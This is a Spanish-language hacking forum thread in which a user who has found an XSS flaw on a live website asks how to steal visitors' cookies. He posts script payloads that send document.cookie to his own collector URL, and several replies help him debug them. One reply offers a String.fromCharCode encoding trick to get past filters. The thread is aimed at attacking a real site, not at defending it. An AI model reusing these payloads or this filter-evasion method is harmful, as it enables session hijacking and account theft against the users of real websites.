 Autor
|
Tema: XSS Help!!! (Leído 8,260 veces)
|
[{O_o}]
 Desconectado
Mensajes: 53
|
Encontre un bug de xss en una pagina web al poner "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto "><scritp>window.location=" http://mysite.us/c.php?cookie="+document.cookie;</script> no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!! |
|
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
esto va en nivel web... XD
prueba con document.location en lugar de window.location
pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/
un saludo!
|
|
|
|
|
En línea
|
|
|
|
[{O_o}]
Desconectado
Mensajes: 53
|
De hecho si pido disculpa no me di cuenta por ponertlo aqui. "><script>document.location=" http://mysite.us/c.php?cookie="+ document.cookie;</script> ya tambien lo e tratado y nada. |
|
|
|
|
En línea
|
|
|
|
|
Shell Root
|
En el primer codigo, no te funko porque pusiste y es xD, ahora en el segundo codigo, intentad ponerlo bajo comillas simples y no dobles |
|
|
|
|
En línea
|
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
|
|
|
|
|
Castg!
Wiki
Desconectado
Mensajes: 1.191
|
que raro  , nose, proba con self.location |
|
|
|
|
En línea
|
|
|
|
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
Haber, muestra lo siguiente:
El codigo php para guardar el archivo de texto con las cookie.
Muestra los permiso del archivo php y los permiso de la carpeta donde esta este.
Muestra una captura aver si el XSS funciona correctamente.
|
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
~ Yoya ~
Wiki
Desconectado
Mensajes: 1.125
|
Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira. Primero vamos encodear el codigo javascript a ASCII , que sera este: <script>window.location="http://www.google.com";</script> Ahora sera: 60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62 Entonce la XSS quedara asi "><script>document.write(String.fromCharCode(
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script> Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII: HerramientaSaludos espero que funcione. |
|
|
|
|
En línea
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
[{O_o}]
Desconectado
Mensajes: 53
|
Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.
|
|
|
|
|
En línea
|
|
|
|
|
 |
